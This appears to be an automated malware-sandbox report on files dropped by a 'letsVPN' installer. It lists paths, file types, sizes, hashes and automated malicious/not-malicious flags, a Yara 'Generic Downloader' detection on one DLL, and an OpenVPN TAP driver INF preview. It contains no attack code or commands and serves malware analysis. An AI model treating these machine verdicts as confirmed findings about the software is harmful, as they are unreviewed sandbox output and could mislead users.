                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.83528093665527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cOss4wvEmF+4wpwlU+nACUOWe6lWwhqWOHlLf2KQcvBZ9ehfS+ShjmM6IGBkSNdn:cO/PArPq3b2KZBZ6S+ST6nkmn
                                                                                                                                                                                                  MD5:AAEDCF923306F04A5261B75D28B71EA7
                                                                                                                                                                                                  SHA1:58BAB697D7E8E5D578E7CDFF2BDE1DA2CB6B427C
                                                                                                                                                                                                  SHA-256:B254C31C34E91F5FE596E0A7DF41A9EB7D03BFBA37F4A8DC8E978E2C6A55769C
                                                                                                                                                                                                  SHA-512:78D29A03E4EC28D431BB44200DD1CE70080F57D1EF0319A880CCAC890C18198418EFECD778C8E665344DEC83A44809B9AEB14981E2535FE1DDBDEBB21EF46149
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.768445701848389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5qXQfVeSN32XFZWe6lWLMhqWOHlLf2KQcvBZ9Vd/VS+ShjmM6IGBkSHn:5g0VyiwEq3b2KZBZ1/VS+ST6nkMn
                                                                                                                                                                                                  MD5:ACF6193D5511378B7C02C03E00386CD1
                                                                                                                                                                                                  SHA1:7D9E11C2C99A4186E7EF5802BCED72315CAF162A
                                                                                                                                                                                                  SHA-256:1B728D394D07AB1CF12E5F70CD2FC558598F068057DF749980DFA02ACE97BFF7
                                                                                                                                                                                                  SHA-512:2C168D1F7F3B4EBC9FEE54689553858EFDBEEFC770F0B79F3F779951480E4CE64F1ADE20FE6C35708C4F555B8847F613BB6C3B15C577EA46AB72F08A5FFB294E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80928
                                                                                                                                                                                                  Entropy (8bit):5.896904626678757
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nGLNpA+N49BVKZUj7uecjqYGBzRuAN8J74zIg/m490sqXz2RgUWEw3qKm/mT:nG6DBduAN8J74zIg/m4HqXz2RgUWEwKw
                                                                                                                                                                                                  MD5:5CE4CBFEC968C625A856438C9E6FB160
                                                                                                                                                                                                  SHA1:9117A4411E22831E4363C92733AE84531FEE5D7C
                                                                                                                                                                                                  SHA-256:0D27592676D964F7F7AB27CA8DCACB7C5B5017A745C4749502BF2227E258859D
                                                                                                                                                                                                  SHA-512:A333D327FDD02BFA0C7EB4CA3A1602F3223ED292EBD5A085C40E6403DAE3DA329B0BA53DB6E7181E3436EB10C73FA247934067EA17025703406FA2773BD01A5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.793372115427383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:i8knfHjuXOQWe6lWihqWOHlLf2KQcvBZ9SGES+ShjmM6IGBkSJO:PAuXO1lq3b2KZBZpES+ST6nkEO
                                                                                                                                                                                                  MD5:4178B66B86ED7539703EC80B6407F0F5
                                                                                                                                                                                                  SHA1:2B1088242E8C5169EB3CAD9399408990119B27D0
                                                                                                                                                                                                  SHA-256:6F015F7F2CCC29F50764D4482E6A3C91B9B4BA1346B76F64438AF0FC544C8D55
                                                                                                                                                                                                  SHA-512:BA87B81AFDAF53FE63C9161D075F5CE4F55C37A0AE967D492695B77E84E18D559B67063D73CD2922D4E1207078D8838A8AF9E424FC8859259A00CC64CCFFD2FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) ARMv7 Thumb, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906272
                                                                                                                                                                                                  Entropy (8bit):7.132105604057801
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:soXErM5iD28EYQg502GXoU5C0ParRvbLk:tXriD28xj52X7arpk
                                                                                                                                                                                                  MD5:692EAC9101A2F178CCF4F3AC8D4E69A7
                                                                                                                                                                                                  SHA1:6E493B2436892DCCC591EE278B3426DB484DCF8D
                                                                                                                                                                                                  SHA-256:D2CC43A027D8AAA688D846665DF8E24F4D3AFAD8C51BC364C47D7FB8C3E596CD
                                                                                                                                                                                                  SHA-512:4E46AB74F40FB20A64535B97AB2473B8F5FFC91520B8B71A7CCC2F4754DD4A516A37C6E0009F8B9A10323445F8EAF2C042B58ED858B12C3769DA46850AB3D099
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1314848
                                                                                                                                                                                                  Entropy (8bit):6.548345207582786
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:UwDD7AuRNZxBNzFlbZcN16AL9hwYi20TAg7wkPxl:UIDbR1L/m9KYixcWH
                                                                                                                                                                                                  MD5:3FD1AFC37E19603D56A261E4AA8DE93B
                                                                                                                                                                                                  SHA1:AD3573E1D2DDECF1128ED06195B4BC0F3E2C1949
                                                                                                                                                                                                  SHA-256:6010694F42A708F29ADBDC9D9C9C7ADBA1E72827FAC30110591FDB238D16C837
                                                                                                                                                                                                  SHA-512:8DAE7E662234270B555FDCFB77043353441A122D640CCE9B62C310C577967438D47D4FD69BB48A03277313F0A98FC34322EF7082BF8C56CE0D5AD10D647E3E5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1030176
                                                                                                                                                                                                  Entropy (8bit):6.751228097849462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:0BvdKGB6hOsMxCmy+rAnpyAqhTz3RzVNUOxKKoSk:0vdKGBmWNAnpc3Rz1KKoSk
                                                                                                                                                                                                  MD5:77EA9B2FD3A7D8787FB80B32F7162A4A
                                                                                                                                                                                                  SHA1:DAF5B3C6B2EDA96C86BE34B57E77D0021A51543D
                                                                                                                                                                                                  SHA-256:3E7F79471A84B3505B781DDA0BDD33A8F5AD5A18C232D724F7E477D92E252DCF
                                                                                                                                                                                                  SHA-512:B91A084B30ABA93F0F10D4165E654308842BCA4152D13B057025684B2BB2963F272473D5A3BE4E0C0A9A3B4C7A39E3876E87F99869AA09252E6E9E71E6CA0C6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.7465535147228035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8fH3xC8M83We6lWWhqWOHlLf2KQcvBZ9qxkS+ShjmM6IGBkSP:Wc8M8Ylq3b2KZBZ8kS+ST6nk8
                                                                                                                                                                                                  MD5:06870433B0EE21628CFBE438EDC9B057
                                                                                                                                                                                                  SHA1:F388968FC210531D664090E008A5D44F42931727
                                                                                                                                                                                                  SHA-256:08892141E0429AE283F7AC6B1702572D809828724F812B7AB7F7B248036053E4
                                                                                                                                                                                                  SHA-512:5CFE6C20C192C4FF02A6831B4CE504BEAC64A075008C74503D8EAF3759596CF47346E75B7E98307C441945CA5A24305A34706EFEF5CC68F1B4E9F97126347E85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):139296
                                                                                                                                                                                                  Entropy (8bit):6.203667467899164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:ypMrTPTNy56J4JQSfB6yRkkGvaYhfls6DREtfw6aQ5ck/e:y6PTQ6Ga+BtakGvVEtC1X
                                                                                                                                                                                                  MD5:98FF7764DA6B97CB3B8B26EECA105F71
                                                                                                                                                                                                  SHA1:28F319FD5A81B3B07FD0F329F7FD675A0E557ED0
                                                                                                                                                                                                  SHA-256:A04EBFCC5F4C641EAEF0DA0FCEB4D0AD65E91A636C723B8F5F4F41F1C4C1F2CD
                                                                                                                                                                                                  SHA-512:2D7D578069EB269855611074BEF654E03C7586F6943AD176B61FC4D3A77FC1402AF89E3F276D562951C9BCA72DC4FF40D3A03905947997D10D9CAA3ADBCE62D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113184
                                                                                                                                                                                                  Entropy (8bit):6.538622877633965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:blzhJmad5M+ekPfJFVwKrSDnuP7HCt+/NyIDfEtPsn/j481sOV/L:blzqaHM+eCTrSDuP7ZbEtUnr51sON
                                                                                                                                                                                                  MD5:37C91BE50E2A9A003AA88E3E91A8BE65
                                                                                                                                                                                                  SHA1:5B728E04200CB5FFDB5A7D904C8AAE7A7FB9AC59
                                                                                                                                                                                                  SHA-256:03E6F5D7A82CD0A22FEEB48983044F8664C2DD319C8942518B224CFF26BC7EAD
                                                                                                                                                                                                  SHA-512:949230C263BD106CAC34CBE716EEAFE0181329DB381FA9EA435EEC432EF4F79886BEAFA3CE6DA996931EB2112560ADAD7D69DBFF12311F56196C52CFB427B9D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282103236061246
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k9DGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4eH4Sq3b2KZBZ2S+ST6nki:kVGL8sTfLWRO+rUhrI7UT5DK93qKM/m8
                                                                                                                                                                                                  MD5:4B265A80F0C5DE434A73E76A2B20632C
                                                                                                                                                                                                  SHA1:E1A7664DE00AD7A0B0BF4054E22625FF6FAD7EB2
                                                                                                                                                                                                  SHA-256:C343E533D53557F6F50721F511559FCC94939CB56EEDCAA1E2299CBB2E4D2D14
                                                                                                                                                                                                  SHA-512:35B24E8CEB5310271E8CE12A885F08BE7BA720050837525877FE280893176E379B2EA2DEB47D42E030B2A787C850C58C1AB647E3B3B7DBE9F09FD0E4DE9B3CD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.251413403033582
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:oGL8sTxyHu6RjvYDGE97we8oEN3qKK/ms:oGhVENm/7
                                                                                                                                                                                                  MD5:80FE3928FBBC68EAE87A7EC53B84CA57
                                                                                                                                                                                                  SHA1:0AECA1C566BA00782820A14B7B262E1191617D5F
                                                                                                                                                                                                  SHA-256:2DB64AE25EFEFC7208DEED114E4AB326C4718A7ADC78BF92642E4F3EDDD18610
                                                                                                                                                                                                  SHA-512:506946BD007C4BFB4777E7A52959CF6E078F6090DE1BCF077A79AAE437CA0F908842C0B89C114D42EB5223B188C3429CB788510B0050ACA92137D1DFE4195BF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.968045952031746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jX3HhVhLu4y8VWe6lWihqWOHlLf2KQcvBZ96I03S+ShjmM6IGBkSF:z3h/aVq3b2KZBZ303S+ST6nkC
                                                                                                                                                                                                  MD5:949581689D35CF1D5EC2D231DAA57041
                                                                                                                                                                                                  SHA1:D6797330D56FBACE397073A8877119BB24F2E83D
                                                                                                                                                                                                  SHA-256:C7B7582C55F44F2DBF7752D181041DE94319DC91CED63031328D2F5A8AAB7C19
                                                                                                                                                                                                  SHA-512:73401AB7C27336C2C0FB284552D5AB2B03F1E0EE410E971FFD684C88D4A36EF213B14A3605B73336050C4B9FD918E7C86CBF8CE26B5F40809D8507BB3567F3B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.963516406614417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:s/wkIv2FCcTWe6lWRhqWOHlLf2KQcvBZ9cPdsmS+ShjmM6IGBkSaq:Sgdsq3b2KZBZO1S+ST6nkvq
                                                                                                                                                                                                  MD5:9CBD975E602B3C1E52CAA03C1EBA9D89
                                                                                                                                                                                                  SHA1:3C32533E5A0221C9A26209ED4936669754BC550C
                                                                                                                                                                                                  SHA-256:3BF3C7DEFE57BF1C243E3424BA02355EE1C0340495ACE2BB082249A3544C1815
                                                                                                                                                                                                  SHA-512:B996ED512BC060AF88E66A6709C92DA9CAF686E4FB9E880139048E9B00A7F3C66A81AA63F589048D1D7EB15DBACAD0BDFEFE247D915C49FBDA322BCDF7F528BB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.2532181397796105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kGL8sTxyHu6RjvYDGE97we8obd3qK//mY:kGhVbdD/j
                                                                                                                                                                                                  MD5:AF0601979DB922F247B0831F02566455
                                                                                                                                                                                                  SHA1:7496C66A37E8C8919CACB134777F273594EDC8BE
                                                                                                                                                                                                  SHA-256:652607BE33864DC6B89863B879925FCE2700FDC7A1752AD83485BDB956057814
                                                                                                                                                                                                  SHA-512:4156E43D1F04D66C78B3C80A8264B28061F2C052DC59B81023EC3D7D1E7A723A44F981087C5BE2334F2E03E6F4D51EA4275BFDC3CD25E4057D6A570681E9FFEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282322783142791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:pdDGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4e+4oq3b2KZBZlnS+ST6nk5:p1GL8sTfLWRO+rUhrI7UT5DXL3qKT/mn
                                                                                                                                                                                                  MD5:DD3AFD8D30B794AFFA6A3AA81C31AFFD
                                                                                                                                                                                                  SHA1:969BC653E46555ED37482B754677A14FE4629E34
                                                                                                                                                                                                  SHA-256:AC606A00D4CAF0C0485EA9B5647F7104F5E0A13C5A88B8253A265B37ABFCFEBF
                                                                                                                                                                                                  SHA-512:880E508630B075B68A2DF05B7CE0BBDB84FEE427BFB65A8237B43FBDA6BB3BE99599021874DB2A17E56EF7F1AB803BA7A385004FB2EC563857DD9CFD1853654D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.252146524644364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:rGL8sTxyHu6RjvYDGE97we8oRx3qKh/mN:rGhVRxl/+
                                                                                                                                                                                                  MD5:E8F404437EE5E95C3B0971985216778B
                                                                                                                                                                                                  SHA1:F642530C433131B29459EB942C5157FAB7B0B664
                                                                                                                                                                                                  SHA-256:D1EDD534AE26455AEDBC4CB720DEFC618CF669631E6C4EAE66267B91DB625B95
                                                                                                                                                                                                  SHA-512:790F2E5A3D7AE5CA06CAAF58C4CE3EA20A1DE647A537DCCF9235A7BB8841075A5C8FDEB871D495CFC04EEDECD895A8D70B6D2BB24C506143FF6A2CA2775C4599
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101536
                                                                                                                                                                                                  Entropy (8bit):5.597950959538587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ImYSYxGfIZnRnD6M7EFOUakPhtUn6KXF4O7WfvZt9c:HYFZnRDGdvPXU6K1RW
                                                                                                                                                                                                  MD5:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  SHA1:824F299E8EFD95BECA7DD531A1067BFD5F03B646
                                                                                                                                                                                                  SHA-256:9F45A39015774EEAA2A6218793EDC8E6273EB9F764F3AEDEE5CF9E9CCACDB53F
                                                                                                                                                                                                  SHA-512:FA5CF687EEFD7A85B60C32542F5CB3186E1E835C01063681204B195542105E8718DA2F42F3E1F84DF6B0D49D7EEBAD6CB9855666301E9A1C5573455E25138A8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1429344
                                                                                                                                                                                                  Entropy (8bit):7.9320530592846135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:8XWYAlLlqSmtLvUDSRbm4Jah1rVxzY8Ja1xbLAAAOurzXuV1F+eAXvUS1vlPA:8mYAlLfeTUDBzrVxzYTOTOu3Xu5AX/l4
                                                                                                                                                                                                  MD5:B5A67867CDCE86E09E2625A6FA4D5FEA
                                                                                                                                                                                                  SHA1:C42E6ED280290648BBD59F664008852F4CFE4548
                                                                                                                                                                                                  SHA-256:5E21C85034311C51D8B0367A773D475AF2392B3DDCD90676C61697C6B5FD2E6A
                                                                                                                                                                                                  SHA-512:31D7081BFFEEB5F32457096E51A29236306E5D971DE7EDB80A51188BCCDA9B9F17F0C3593D30828FC140B7A023F5B6842BC922F2023C7B8EA3786C2DBEC40472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100646
                                                                                                                                                                                                  Entropy (8bit):7.0924503598442445
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CXv9qKohEb1guqeLlt3cgATZ+eWeH+BCwVWWBKx1iv:CXsKoGBxJcgGZ+bVWWBm1k
                                                                                                                                                                                                  MD5:BCAE38E6266524A76A57546527DED8CE
                                                                                                                                                                                                  SHA1:79F3040BAEA4C4987CEDB10D30845F70E9D64B0C
                                                                                                                                                                                                  SHA-256:20A400938F7A953DFBA8F89B03555EA3DACFA9D51F71EA15C35258B722BADACA
                                                                                                                                                                                                  SHA-512:35D37CFD07766A76DE222FAC610379D309073065650398EB9A075CF5CAC23EBF3B4599C712ADCB27162CA49F1BF4B0A2249299AC155938E9744F69F44AF1A125
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                  Entropy (8bit):6.901141332438222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZgAswxWzmF+kB7CtT2UiGuxfbM/sR/9UFF+kB7CtT2UiGux:OmWQp7rUCJ4/sR9Uvp7rUC
                                                                                                                                                                                                  MD5:AF4898E8762C23845474DFD6C6B7047E
                                                                                                                                                                                                  SHA1:0FC576A3F2467B47686F71704CA44599CBF96CAB
                                                                                                                                                                                                  SHA-256:7910A6E02CE1FE5B519633EFB910F173CAC517D56665A75B50054E0D9656F554
                                                                                                                                                                                                  SHA-512:7693AA3748A56BE4D1AC75B77F2CB8FE01FE71CC278F67ACF5E4D5E5504C9B94FEED0622BA19C09F376941B2551C7C0251409099FEBB97A9AFA167F8FC42779C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.016938637522631
                                                                                                                                                                                                  Encrypted:false
